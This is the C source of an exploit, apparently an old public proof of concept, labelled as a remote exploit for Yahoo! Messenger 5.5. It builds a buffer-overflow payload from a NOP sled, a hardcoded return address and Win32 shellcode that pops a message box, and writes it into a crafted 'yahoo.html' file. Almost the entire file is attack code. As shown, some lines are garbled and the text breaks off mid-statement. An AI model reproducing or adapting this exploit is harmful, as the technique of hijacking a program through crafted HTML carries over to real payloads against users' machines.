#include
#include
#include
#define MessageBoxA "\x1d\x97\x53\x01"
char ret[8]= "\xD5\x96\x7A\x01";
unsigned char win32_msgbox[] = {
"\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01"
" \x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\x
E2\xFF\xFF\xFF"
" \x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
};
int main(int argc,char *argv[])
{
FILE *evil;
char *shellcode = win32_msgbox;
unsigned char buffer[5000];
int offset=320;
fprintf(stdout, "\n\tYahPoo.c By bob.\n");
fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
fprintf(stdout, "\tDSR-[http://www.dtors.net/]-DSR\n\n");
fprintf(stdout,"Makin' da EbUL HTML File... ");
if ((evil =fopen("yahoo.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Opened!\n");
}
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);
memcpy(buffer+offset,ret,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode
));
buffer[264] = 0xD4; //address of &shellcode
buffer[265] = 0x96;
buffer[266] = 0x7A;
buffer[267] = 0x01;
buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
buffer[273] = 0x01;
buffer[274] = 0x01;
buffer[275] = 0x78;
fprintf(evil,"");
fprintf(evil,"\n");
fprintf(evil,"Dtors Security Research (DSR)\n");
fprintf(evil,"
Yahoo Messenger 5.5 exploit....
\n");
fprintf(evil,"
");